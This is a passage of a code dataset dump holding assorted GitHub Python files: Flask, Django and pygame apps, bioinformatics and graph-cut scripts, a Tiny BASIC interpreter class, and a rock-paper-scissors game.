user:\n login_user(user)\n return\n abort(jsonify({'status': '203', 'message': '验证失败'}))","repo_name":"KinderFire/CRE_TMPL","sub_path":"flask/flasky.py","file_name":"flasky.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15058734895","text":"#!/usr/bin/env python3\n\nfrom Bio import SeqIO\n\nrec = SeqIO.index_db(snakemake.input.fdb)\nrec = rec[snakemake.params.acc]\nif snakemake.params.pid:\n feature = next(\n ele\n for ele in rec.features\n if ele.type == \"CDS\" and ele.qualifiers[\"protein_id\"][0] == snakemake.params.pid\n )\n rec = feature.extract(rec)\n rec.id = snakemake.params.pid\n product = feature.qualifiers.get(\"product\", [\"n/a\"])[0]\n rec.description = f\"{rec.id}|{feature.location} {product}\"\n\nSeqIO.write(rec, snakemake.output.fas, \"fasta\")\nSeqIO.write(rec, snakemake.output.gbk, \"genbank\")\n","repo_name":"dnanto/dissertation-prototype-1","sub_path":"workflow/scripts/ffref.py","file_name":"ffref.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9671638680","text":"\"\"\"\nJust a usage example\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pylab as plt\n\nimport maxcutpy.graphdraw as gd\nimport maxcutpy.maxcut as mc\nimport maxcutpy.graphcut as gc\nimport maxcutpy.graphtest as gt\n\n\n__license__ = \"GPL\"\n\n\nif __name__ == '__main__':\n\n seed = 123\n\n # most used graphs\n G1 = nx.erdos_renyi_graph(n=24, p=0.3, seed=seed)\n\n # some cool graphs\n G2 = nx.star_graph(20)\n G3 = nx.path_graph(30)\n G4 = nx.petersen_graph()\n G5 = nx.dodecahedral_graph()\n G6 = nx.house_graph()\n G7 = nx.moebius_kantor_graph()\n G8 = nx.barabasi_albert_graph(5, 4)\n G9 = nx.heawood_graph()\n G10 = nx.icosahedral_graph()\n G11 = nx.sedgewick_maze_graph()\n G12 = nx.havel_hakimi_graph([1, 1])\n G13 = nx.complete_graph(20)\n G14 = nx.bull_graph()\n\n G = G1 # choose a graph from the list\n\n gd.draw_custom(G)\n plt.show()\n\n #exact cut\n print(\"Time 'local_consistent_max_cut':\" + str(gt.execution_time(mc.local_consistent_max_cut, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n print('\\n')\n print(\"Time 'lazy_local_consistent_max_cut':\" + str(gt.execution_time(mc.lazy_local_consistent_max_cut, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n print('\\n')\n\n gd.draw_cut_graph(G)\n plt.show()\n\n #approximated cut\n print(\"Time 'trevisan_approximation_alg': \" + str(gt.execution_time(mc.trevisan_approximation_alg, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n\n gd.draw_cut_graph(G)\n plt.show()\n\n print('\\n')\n print('Time Greedy: ' + str(gt.execution_time(mc.greedy_cut, 1, G)))\n print('Edges cut: ' + str(gc.cut_edges(G)))\n\n gd.draw_cut_graph(G)\n plt.show()\n\n\n","repo_name":"bluesurfer/maxCutPy","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"16066941519","text":"from tiny_basic.errors import TinyBasicException\r\n\r\n\r\nclass Variable:\r\n TYPE_STR = 'STRING'\r\n TYPE_NUM = 'NUM'\r\n TYPE_INT = 'INT'\r\n TYPE_ANY = ''\r\n\r\n def __init__(self, name: str, base_type: str, dim: int = 1, value = None):\r\n self.base_type = base_type\r\n self.dim = dim\r\n self.name = name\r\n if self.base_type == Variable.TYPE_STR and not name.endswith('$'):\r\n raise TinyBasicException(f'STRING VAR MUST END WITH $ {name}')\r\n if self.base_type == Variable.TYPE_NUM and name.endswith('$'):\r\n raise TinyBasicException(f'NUMERIC VAR MUST NOT END WITH $ {name}')\r\n if dim < 0:\r\n raise TinyBasicException(f'DIM should be a positive number, not {dim} for {name}')\r\n if value is None:\r\n self.value = []\r\n for i in range(0, dim):\r\n self.value.append(None)\r\n else:\r\n if len(value) != dim:\r\n raise TinyBasicException(f'Wrong init value for {name}')\r\n self.value = value\r\n\r\n def get_type(self):\r\n if self.dim == 1:\r\n return self.base_type\r\n else:\r\n return f'{self.base_type}[{self.dim}]'\r\n\r\n def verify_index(self, index: int):\r\n if (not 0 <= index < self.dim) or self.value is None:\r\n raise TinyBasicException(f'{index} IS OUT OF BOUNDS FOR {self.name}: 0..{self.dim}')\r\n\r\n def read(self, index: int, type: str or None = None):\r\n if type is not None and self.base_type != type:\r\n raise TinyBasicException(f'{self.name} IS NOT {type}')\r\n self.verify_index(index)\r\n result = self.value[index]\r\n if result is None:\r\n raise TinyBasicException(f'{self.name}[{index}] IS NOT YET ASSIGNED')\r\n return result\r\n\r\n def write(self, index: int, value):\r\n self.verify_index(index)\r\n self.value[index] = value\r\n\r\n def read_num(self, index: int = 0) -> int or float:\r\n result = self.read(index, Variable.TYPE_NUM)\r\n if not (isinstance(result, int) or isinstance(result, float)):\r\n raise TinyBasicException(f'{self.name}[{self.dim}] IS NOT A NUMBER')\r\n return result\r\n\r\n def read_str(self, index: int = 0) -> str:\r\n result = self.read(index, Variable.TYPE_STR)\r\n if not (isinstance(result, str)):\r\n raise TinyBasicException(f'{self.name}[{self.dim}] IS NOT A STRING')\r\n return result\r\n\r\n def write_num(self, value: int or float, index: int = 0):\r\n if not (isinstance(value, int) or isinstance(value, float)):\r\n raise TinyBasicException(f'{value} IS NOT A NUMBER')\r\n self.write(index, value)\r\n\r\n def write_str(self, value: str, index: int = 0):\r\n if not isinstance(value, str):\r\n raise TinyBasicException(f'{value} IS NOT A STRING')\r\n self.write(index, value)\r\n\r\n def write_num_array(self, value: list[int or float]):\r\n self.dim = len(value)\r\n self.value = value\r\n\r\n def write_str_array(self, value: list[str]):\r\n self.dim = len(value)\r\n self.value = value\r\n","repo_name":"fun-with-compilers/fwc_tiny_basic_line_interpreter","sub_path":"tiny_basic/vm/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42708757854","text":"# Importamos la libreria ZODB y transaction\nfrom ZODB import FileStorage, DB\nfrom ZEO import ClientStorage\nimport transaction\n\nclass MiZODB(object):\n ''' Base de Datos '''\n def __init__(self, addr):\n ''' Levanta una base de Datos '''\n # Opcion con FileStorage\n #self.storage = FileStorage.FileStorage(addr)\n ## Opcion con ClientStorage - Funcion Cliente-Servidor ##\n self.storage = ClientStorage.ClientStorage(addr, cache_size=1000)\n self.db = DB(self.storage, cache_size=1000)\n self.conexion = self.db.open()\n self.raiz = self.conexion.root()\n\n def close(self):\n ''' Sirve para cerrar la base de Datos '''\n self.conexion.close()\n self.db.close()\n self.storage.close()","repo_name":"danicaceres1998/ProSoft","sub_path":"Persistencia/mizodb.py","file_name":"mizodb.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41035682919","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 12 01:44:09 2019\r\n\r\n@author: yiyuezhuo\r\n\"\"\"\r\n\r\n'''\r\n4,5,6 \r\n-> \r\n4_train, 5_train, 6_train, \r\n4_train_anno,5_train_anno,6_train_anno \r\n'''\r\n\r\nimport os\r\nimport random\r\nimport shutil\r\n\r\nrandom.seed(8964)\r\n\r\nconfig = {\r\n '4': 60,\r\n '5': 60,\r\n '6': 60\r\n}\r\n\r\nfor root, num_sample in config.items():\r\n name_list = os.listdir(root)\r\n root_train = root+'_train'\r\n os.makedirs(root_train, exist_ok=True)\r\n os.makedirs(root_train+'_anno',exist_ok=True)\r\n random.shuffle(name_list)\r\n name_list_sampled = name_list[:num_sample]\r\n for name in name_list_sampled:\r\n ori_path = os.path.join(root, name)\r\n tar_path = os.path.join(root_train, name)\r\n shutil.copy(ori_path, tar_path)\r\n print('Copy {} -> {}'.format(ori_path, tar_path))\r\n \r\n \r\n ","repo_name":"yiyuezhuo/drone-tracking","sub_path":"videos_frames/sample_labelImg_dataset.py","file_name":"sample_labelImg_dataset.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24641641911","text":"from django.http import HttpResponse, request\nfrom django.shortcuts import render, redirect\nfrom django.core.mail import BadHeaderError, send_mail, EmailMultiAlternatives\nfrom django.conf import settings \nfrom .models import Appointments, Queries\nfrom socket import gaierror, timeout\nfrom django.contrib import messages\n\n# Create your views here.\ndef index(request):\n if (request.method == \"POST\"):\n userName = request.POST[\"Name\"]\n userEmail = request.POST[\"Email\"]\n userPhno = request.POST[\"ContactNum\"]\n userMsg = request.POST[\"userQuery\"]\n body = f\"\"\"

Name : {userName}


Phone no : {userPhno}


query

{userMsg}

\"\"\"\n subj = \"Query\"\n msg, status = send_email(subj, userEmail, body)\n #print(userName,\" \",userMsg,\" \",userPhno,\" \",userEmail)\n params = {'responce':msg, 'status':status}\n if (status==\"success\"):\n data = Queries.objects.create(\n User_Name= userName,\n User_Email= userEmail,\n User_Contact= userPhno,\n User_Discription= userMsg)\n data.save()\n return render(request, 'index.html', params)\n else:\n params = {}\n return render(request, 'index.html', params)\n\ndef base(request):\n return render(request, 'base.html')\n\ndef bookings(request):\n if (request.method == \"POST\"):\n userFirstName = request.POST[\"CFirstName\"]\n userLastName = request.POST[\"CLastName\"]\n userEmail = request.POST[\"cEmail\"]\n userContact = request.POST[\"cContactNo\"]\n BookingDate = request.POST[\"BookedOn\"]\n apptDate = request.POST[\"apptDate\"]\n userEvent = request.POST[\"cEvent\"]\n userMsg = request.POST[\"cMessage\"]\n\n body = f\"\"\"

User Name : {userFirstName}{userLastName}
User Email: {userEmail}
Phon No : {userContact}
Booked on :{BookingDate}
Appointment Date : {apptDate}
For {userEvent}


Message :{userMsg}

\"\"\"\n\n subj = \"Regards Booking Appointment\"\n msg, status = send_email(subj, userEmail, body)\n params = {'responce':msg, 'status':status}\n if (status==\"success\"):\n Adata = Appointments.objects.create(User_FirstName=userFirstName,\n User_LastName= userLastName,\n User_Email= userEmail,\n User_Contact= userContact,\n User_BookedOn= BookingDate,\n User_ApptDate= apptDate,\n User_Event= userEvent,\n User_Suggestion= userMsg)\n print(status)\n Adata.save()\n print(status)\n return render(request, 'book.html', params)\n else:\n params = {}\n return render(request, 'book.html', params)\n\ndef send_email(subject, Uemail, body):\n text_content = \"A mail from UkPhotography user\"\n html_content = f'{body}'\n from_mail = settings.EMAIL_HOST_USER\n msg = EmailMultiAlternatives(subject, text_content, from_mail, ['ukphotography2002@gmail.com'], reply_to=[Uemail,])\n msg.attach_alternative(html_content, \"text/html\")\n try:\n msg.send()\n except BadHeaderError:\n Msg = \"Invalid header found\"\n status = \"error\"\n return(Msg, status)\n except (gaierror, timeout):\n Msg = \"SORRY!
Check your internet connection or try again after some time\"\n status = \"error\"\n return(Msg, status)\n Msg=\"Thank you for getting in touch!
we will get back in touch with you soon!
Have a great day!\"\n status = \"success\"\n return(Msg, status)","repo_name":"LalitNath1221/pUkStudio","sub_path":"PhotoStudio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"33132247716","text":"#!/usr/bin/env python3\n\n\"\"\"\nSelectPlayer handler module\n\"\"\"\n\nimport pygame\nfrom helik.modes.standard import Mode\nfrom helik.htypes import BoardType, GameMode\nfrom helik.game.player import Player\nfrom helik.hdefs import ARENA_WIDTH, ARENA_HEIGHT\n\n\nclass SelectPlayer(Mode):\n \"\"\"\n SelectPlayer handler class\n \"\"\"\n def __init__(self, parent):\n \"\"\"\n Class constructor\n \"\"\"\n super().__init__(parent)\n self.viewpos = 0\n self.rects = []\n self.view_x = 0\n self.view_y = 0\n self.vehicles = [self.images[\"vehicles\"][0],\n self.images[\"vehicles\"][2],\n self.images[\"vehicles\"][4]]\n x = ARENA_WIDTH // 4\n for image in self.vehicles:\n r = image.get_rect()\n r.center = (x, ARENA_HEIGHT // 2)\n x += ARENA_WIDTH // 4\n self.rects.append(r)\n\n def on_paint(self):\n \"\"\"\n Paint event handler\n \"\"\"\n self.buffer.blit(self.res_man.images[\"default-background\"], (0, 0))\n for i in range(len(self.rects)):\n self.buffer.blit(self.vehicles[i], self.rects[i])\n r = self.images[\"viewport\"].get_rect()\n r.center = ((self.viewpos + 1) * ARENA_WIDTH // 4, ARENA_HEIGHT // 2)\n self.buffer.blit(self.images[\"viewport\"], r)\n\n def on_keyup(self, key):\n \"\"\"\n Key release event handler\n :param key: key code\n \"\"\"\n if key == pygame.K_LEFT:\n if self.viewpos > 0:\n self.viewpos -= 1\n self.audio.play_sound(\"arrow\")\n elif key == pygame.K_RIGHT:\n if self.viewpos < len(self.images[\"vehicles\"]) - 1:\n self.viewpos += 1\n self.audio.play_sound(\"arrow\")\n elif key == pygame.K_RETURN:\n self.game.player = Player(self.game, self.viewpos)\n self.game.change_mode(GameMode.PREPARE)\n elif key == pygame.K_ESCAPE:\n self.arena.change_board(BoardType.MENU)\n elif key == pygame.K_q:\n self.arena.change_board(BoardType.MENU)\n","repo_name":"lvajxi03/helik","sub_path":"pysrc/helik/modes/selectplayer.py","file_name":"selectplayer.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12138457296","text":"# -*- coding: utf-8\n# pylint: disable=line-too-long\nimport csv\nimport numpy as np\nimport sys\nimport os\nimport anvio.utils as utils\n\n\n\ndef get_data_from_txt_file(file_name):\n data_list = list(csv.reader(open(file_name), delimiter='\\t'))\n Nsamples = len(data_list[0]) - 1\n Ngenes = len(data_list) - 1\n\n sample_name_dictionary = {}\n for i in range(0,Nsamples):\n sample_name_dictionary[i] = data_list[0][i+1]\n\n gene_callers_id_dictionary = {}\n for i in range(0,Ngenes):\n gene_callers_id_dictionary[i] = data_list[i+1][0]\n\n data = np.loadtxt(file_name, delimiter='\\t', skiprows=1, usecols=range(1, Nsamples + 1))\n return(data, sample_name_dictionary, gene_callers_id_dictionary)\n\n\ndef get_positive_samples(data,alpha=0.05,beta=0.5):\n # Identify samples that contain your organism of interest (from here on: positive samples):\n # input:\n # data - data matrix\n # alpha - cutoff for gene detection (portion of median value)\n # beta - cutoff for positive sample (portion of detected genes)\n # output:\n # positive_samples_list - list of positive samples\n\n gene_detection_matrix = np.zeros_like(data)\n Ngenes = len(data)\n positive_samples_list = []\n for sample_number in range(len(data[0])):\n # getting the median of the non-zero coverage values for\n median_value = np.median(data[np.nonzero(data[:,sample_number]),sample_number])\n gene_detection_matrix[:,sample_number] = data[:, sample_number] > alpha * median_value\n print('sample %s max detection: real max: '% (sample_number))\n print(data[np.nonzero(gene_detection_matrix[:,sample_number]),sample_number][0])\n print(max(data[np.nonzero(gene_detection_matrix[:,sample_number])][0]))\n print(max(data[:,sample_number]))\n if sum(gene_detection_matrix[:,sample_number]) > beta * Ngenes:\n positive_samples_list.append(sample_number)\n return positive_samples_list, gene_detection_matrix\n\n\ndef alternative_algorithm(data, alpha=0.5, beta=1):\n Ns = len(data[0])\n Ngenes = len(data)\n # Initialize list of TS (Taxon Specific genes)\n taxon_specific_genes = range(Ngenes)\n # Initialize list of positive/negative samples\n sample_detection = np.ones(Ns)\n converged = False\n loss = None\n while not converged:\n # mean of coverage of all TS genes in each sample\n mean = np.mean(data[taxon_specific_genes, :], axis=0) # calculating the mean along the columns\n\n # determining the detection of the Genome in each sample\n detection_portion = sum(np.abs(np.abs(data[taxon_specific_genes, :]-mean)-3*np.sqrt(np.var(data[\n taxon_specific_genes, :],axis=0))))\n for sample in range(Ns):\n if detection_portion[sample] >= alpha * Ngenes:\n sample_detection[sample] = 1\n else:\n sample_detection[sample] = 0\n\n # calculate adjusted variance of each gene (adjusted variance is just a name I made-up for this term\n positive_samples = np.nonzero(sample_detection)[0]\n v = np.var(data[:, positive_samples] / mean[positive_samples], axis=1)\n\n # classifying genes (TS or NTS)\n taxon_specific_genes = []\n for gene_id in range(Ngenes):\n if v[gene_id] <= beta:\n taxon_specific_genes.append(gene_id)\n\n # calculating the loss function\n number_of_NTS = Ngenes - len(taxon_specific_genes)\n new_loss = beta * number_of_NTS + sum(v[taxon_specific_genes])\n\n # Check convergence\n if loss is not None:\n if new_loss >= loss:\n converged = True\n loss = new_loss\n\n return taxon_specific_genes, positive_samples\n\ndef get_taxon_specific_candidates(data, positive_samples_list, gene_detection_matrix, gamma=10):\n # Find the taxon specific candidate genes in each sample\n # input:\n # data - data matrix\n # positive_samples_list - list of positive samples\n # output:\n # taxon_specific_candidates_matrix - a matrix in which for each gene there are 1's in samples in which it is\n # identified as a taxon specific candidate and 0 otherwise\n\n Ngenes = len(data)\n taxon_specific_candidates_matrix = np.zeros_like(data, dtype=bool)\n\n for sample_number in positive_samples_list:\n converged = False\n\n # approximation of the median value (only of detected genes):\n detected_genes = np.nonzero(gene_detection_matrix[:,sample_number])\n median_coverage = np.median()\n median_coverage_index = np.argsort(data[detected_genes, sample_number][0])[detected_genes[0][len(\n detected_genes[0])//2]]\n print('this: %s' % detected_genes[0][len(\n detected_genes[0])//2])\n print(data[detected_genes, sample_number][0])\n print(np.argsort(data[detected_genes, sample_number][0]))\n median_coverage = data[median_coverage_index, sample_number]\n sorted_indexes = np.argsort(np.absolute(data[:, sample_number] - median_coverage))\n print('sample number %s, the median value is %s in index number %s' % (sample_number, median_coverage, median_coverage_index))\n print('the sorted indexes: %s' % sorted_indexes)\n var = 0\n mean = median_coverage\n cluster = {'gene_ids': [median_coverage_index], 'gene_coverages': [median_coverage]}\n gene_number = 1\n while not converged and gene_number < Ngenes:\n new_gene_number = sorted_indexes[gene_number]\n new_gene_coverage = data[new_gene_number, sample_number]\n if var == 0:\n cutoff = 0.1 * mean\n else:\n cutoff = max(gamma * np.sqrt(var), 0.1 * mean)\n if abs(mean - new_gene_coverage) > cutoff:\n converged = True\n else:\n cluster['gene_ids'].append(new_gene_number)\n cluster['gene_coverages'].append(new_gene_coverage)\n # updating the new mean\n new_mean = (mean * gene_number + new_gene_coverage) / (gene_number + 1)\n # updating the new variance\n var = (gene_number * var + (new_gene_coverage - new_mean) * (new_gene_coverage - mean)) / (gene_number + 1)\n mean = new_mean\n gene_number += 1\n # setting the value of the genes in the cluster as 1\n taxon_specific_candidates_matrix[cluster['gene_ids'], sample_number] = True\n # print(adfasdf)\n return taxon_specific_candidates_matrix\n\n\ndef get_taxon_specific_labels_from_taxon_specific_candidates_matrix(taxon_specific_candidates_matrix,\n gene_detection_matrix, eta=0.8):\n # Decide which genes are taxon specific according to a majority vote\n # input:\n # taxon_specific_candidates_matrix\n # output:\n # taxon_specific_labels - dictionary with gene_callers_id as keys and values of 'TS' for Taxon-Specific and\n # 'NTS' for Non Taxon-Specific\n Ngenes = len(taxon_specific_candidates_matrix)\n taxon_specific_genes = []\n for gene_number in range(Ngenes):\n print('gene %s is detected in %s samples and TS in %s samples, and overlap in %s samples' % (gene_number,\n sum(gene_detection_matrix[gene_number,:]),sum(taxon_specific_candidates_matrix[gene_number,:]), sum(np.multiply(\n taxon_specific_candidates_matrix[gene_number,:],gene_detection_matrix[gene_number,:]))))\n if sum(np.multiply(taxon_specific_candidates_matrix[gene_number,:],gene_detection_matrix[gene_number,\n :])) / sum(gene_detection_matrix[\n gene_number,:]) > eta:\n taxon_specific_genes.append(gene_number)\n return taxon_specific_genes\n\n\ndef get_accessory_genes(data, taxon_specific_genes, positive_samples, a=3):\n Ngenes = len(data)\n Ns = len(data[0])\n # indices of the sub-matrix containing all Taxon-specific genes only in positive samples:\n # calculating the mean of the taxon specific genes in each positive sample\n gene_detection = np.zeros((Ngenes, Ns), dtype=bool)\n for sample in positive_samples:\n mean_of_TS_coverage = np.mean(data[taxon_specific_genes, sample])\n std_of_TS_coverage = np.std(data[taxon_specific_genes, sample])\n print('sample number %s, mean is %s, std is %s' % (sample, mean_of_TS_coverage, std_of_TS_coverage))\n # if the gene coverage is more than 'a' times the std smaller than average then it is considered to be not\n # detected (or disconnected) from the sample\n # gene_detection[:, sample] = data[:, sample] - mean_of_TS_coverage > -a * std_of_TS_coverage\n gene_detection[:, sample] = np.logical_and(data[:, sample] - mean_of_TS_coverage > -a * std_of_TS_coverage,\n data[:,sample] > 0)\n print(np.sum(gene_detection[:,sample]))\n\n # array showing in how many samples the gene is detected\n gene_detection_layer = np.sum(gene_detection,axis=1)\n\n accessory_genes = np.zeros(Ngenes)\n for gene_id in range(Ngenes):\n if gene_detection_layer[gene_id] > 0.9 * len(positive_samples):\n accessory_genes[gene_id] = 0\n else:\n accessory_genes[gene_id] = 1\n\n return gene_detection_layer, accessory_genes\n\n\ndef get_gene_classes_dictionary(taxon_specific_dictionary, accessory_genes, gene_callers_id_dictionary):\n from gen_mock_data import gene_class_id_dictionary_reverese\n gene_classes_dictionary = {}\n for gene_id in gene_callers_id_dictionary.keys():\n if taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'TS' and accessory_genes[gene_id] == 0:\n # Taxon specific core\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[1]\n elif taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'TS' and accessory_genes[gene_id] == 1:\n # Taxon specific accessory\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[3]\n elif taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'NTS' and accessory_genes[gene_id] == 0:\n # Non taxon specific core\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[4]\n elif taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'NTS' and accessory_genes[gene_id] == 1:\n # Non taxon specific accessory\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[5]\n\n return gene_classes_dictionary\n\n\ndef gen_taxon_specific_dictionary_from_list(taxon_specific_genes,gene_callers_id_dictionary):\n taxon_specific_dictionary = dict(zip(gene_callers_id_dictionary.values(),['NTS'] * len(\n gene_callers_id_dictionary)))\n print(gene_callers_id_dictionary)\n for gene_id in taxon_specific_genes:\n taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] = 'TS'\n return taxon_specific_dictionary\n\n\ndef save_tabular_to_txt(dictionary, new_txt_output, first_column_title, additional_columns_title,\n old_txt=None):\n if old_txt is None:\n with open(new_txt_output, 'w') as txt_file:\n writer = csv.writer(txt_file, delimiter='\\t')\n # writing the title row\n first_row = [first_column_title] + additional_columns_title\n writer.writerow(first_row)\n for key, value in dictionary.items():\n writer.writerow([key, value])\n else:\n with open(old_txt, 'r') as old_file:\n reader = csv.reader(old_file, delimiter='\\t')\n with open(new_txt_output, 'w') as txt_file:\n writer = csv.writer(txt_file, delimiter='\\t')\n first_row = list(next(reader)) + additional_columns_title\n writer.writerow(first_row)\n for row in reader:\n print(row + [dictionary[row[0]]])\n writer.writerow(row + [dictionary[row[0]]])\n\n\ndef save_taxon_specific_labels_to_txt(taxon_specific_dictionary, txt_output, additional_layers_txt=None):\n save_tabular_to_txt(dictionary=taxon_specific_dictionary,new_txt_output=txt_output,\n first_column_title='gene_callers_id',additional_columns_title=['taxon_specific_label'],\n old_txt=additional_layers_txt)\n\n\ndef get_samples_detection_dictionay(positive_samples_list, sample_name_dictionary):\n samples_detection_dictionay = {}\n for sample in sample_name_dictionary:\n if sample in positive_samples_list:\n samples_detection_dictionay[sample_name_dictionary[sample]] = 'P'\n else:\n samples_detection_dictionay[sample_name_dictionary[sample]] = 'N'\n return samples_detection_dictionay\n\ndef get_negative_samples(positive_samples_list,sample_name_dictionary):\n negative_samples = list(set(sample_name_dictionary.keys()) - set(positive_samples_list))\n return negative_samples\n\n\ndef save_sample_detection_information_to_sample_information_file(positive_samples_list, sample_name_dictionary,\n txt_output, sample_information_txt=None):\n samples_detection_dictionay = get_samples_detection_dictionay(positive_samples_list, sample_name_dictionary)\n save_tabular_to_txt(dictionary=samples_detection_dictionay, new_txt_output=txt_output,\n first_column_title='samples', additional_columns_title=['detection_of_genome'],\n old_txt=sample_information_txt)\n\n\ndef tests():\n # input_name = 'test_200'\n input_name = 'p214_Bfrag_positive_with_M_GG_gene_coverage'\n input_data = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '.txt'\n data, sample_name_dictionary, gene_callers_id_dictionary = get_data_from_txt_file(input_data)\n print(data.shape)\n # get the positive samples\n positive_samples_list , gene_detection_matrix = get_positive_samples(data)\n print('The number of positive samples is %s'%len(positive_samples_list))\n negative_samples = get_negative_samples(positive_samples_list,sample_name_dictionary)\n print('The following samples are negative: %s' % ([sample_name_dictionary[key] for key in negative_samples]))\n # testing get_taxon_specific_candidates\n taxon_specific_candidates_matrix = get_taxon_specific_candidates(data, positive_samples_list, gene_detection_matrix)\n print(len(taxon_specific_candidates_matrix))\n print(len(np.nonzero(taxon_specific_candidates_matrix)[0]))\n\n # testing get_taxon_specific_labels_from_taxon_specific_candidates_matrix\n taxon_specific_genes = get_taxon_specific_labels_from_taxon_specific_candidates_matrix(\n taxon_specific_candidates_matrix, gene_detection_matrix, eta=0.8)\n print('The number of taxon specific genes is: %s ' % len(taxon_specific_genes))\n\n # save the results\n taxon_specific_dictionary = gen_taxon_specific_dictionary_from_list(taxon_specific_genes,\n gene_callers_id_dictionary)\n txt_output = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_taxon_specific_genes.txt'\n additional_layers_txt = None # '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/test_additional_layers.txt'\n save_taxon_specific_labels_to_txt(taxon_specific_dictionary, txt_output, additional_layers_txt)\n\n sample_information_txt = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + \\\n '_sample_information.txt'\n old_sample_information = None\n save_sample_detection_information_to_sample_information_file(positive_samples_list, sample_name_dictionary,\n sample_information_txt,old_sample_information)\n\n # test get_accessory_genes(data, taxon_specific_genes, positive_samples)\n gene_detection_layer, accessory_genes = get_accessory_genes(data, taxon_specific_genes, positive_samples_list)\n\n # get_gene_classes\n gene_classes_dictionary = get_gene_classes_dictionary(taxon_specific_dictionary, accessory_genes, gene_callers_id_dictionary)\n txt_output = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_additional_layers.txt'\n additional_layers_txt = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_taxon_specific_genes.txt'\n save_tabular_to_txt(gene_classes_dictionary, txt_output, 'gene_callers_id', ['gene_class'], additional_layers_txt)\n\n # save_\n\n # # running the alternative algorithm\n # taxon_specific_genes_alt, positive_samples_list_alt = alternative_algorithm(data, alpha=0.5, beta=1)\n #\n # # save the results\n # taxon_specific_dictionary_alt = gen_taxon_specific_dictionary_from_list(taxon_specific_genes_alt,\n # gene_callers_id_dictionary)\n # print(taxon_specific_dictionary_alt)\n # txt_output = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_taxon_specific_genes_alt.txt'\n # additional_layers_txt = None\n # save_taxon_specific_labels_to_txt(taxon_specific_dictionary_alt, txt_output, additional_layers_txt)\n #\n # sample_information_txt = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + \\\n # '_sample_information_alt.txt'\n # old_sample_information = None\n # save_sample_detection_information_to_sample_information_file(positive_samples_list_alt, sample_name_dictionary,\n # sample_information_txt,old_sample_information)\n\n\nif __name__ == '__main__':\n tests()","repo_name":"ShaiberAlon/MACg","sub_path":"MACg/get_taxon_specific_genes_from_matrix.py","file_name":"get_taxon_specific_genes_from_matrix.py","file_ext":"py","file_size_in_byte":18150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23839954609","text":"import random\n\nuser_score = 0\ncomputer_score = 0\n\noptions = [\"rock\", \"paper\", \"scissors\"]\n\nwhile True:\n user_input = input(\"Type Rock/Paper/Scissors or Q to quit: \").lower()\n if user_input == \"q\":\n quit()\n\n if user_input not in options :\n print(\"Please try again. \")\n continue\n \n random_number = random.randint (0,2)\n\n # 0:rock, 1:paper and 2:scissors\n\n computer_hand = options[random_number]\n print(\"Computer picked\", computer_hand + \".\")\n\n if user_input == \"rock\" and computer_hand == \"scissors\":\n print(\"You won!\")\n user_wins += 1\n continue\n\n elif user_input == \"paper\" and computer_hand == \"rock\":\n print(\"You won!\")\n user_wins += 1\n continue\n\n elif user_input == \"scissors\" and computer_hand == \"paper\":\n print(\"You won!\")\n user_wins += 1\n continue\n\n else:\n print(\"You lost!\")\n computer_wins += 1\n\n \nprint(\"You won\", user_score , \"times!\")\nprint(\"The computer one\", computer_score, \"times\")\nprint(\"Goodbye\")\n\n\n\n","repo_name":"christoperipper/my_first_python_programme","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35027043272","text":"#создай игру \"Лабиринт\"!\r\nfrom pygame import *\r\ngame = True\r\nfinish = False\r\nwin_width = 700\r\nwin_height = 500\r\nclass GameSprite(sprite.Sprite):\r\n def __init__(self, player_image, player_x, player_y, player_speed):\r\n super().__init__()\r\n self.image = transform.scale(image.load(player_image), (65, 65))\r\n self.speed = player_speed\r\n 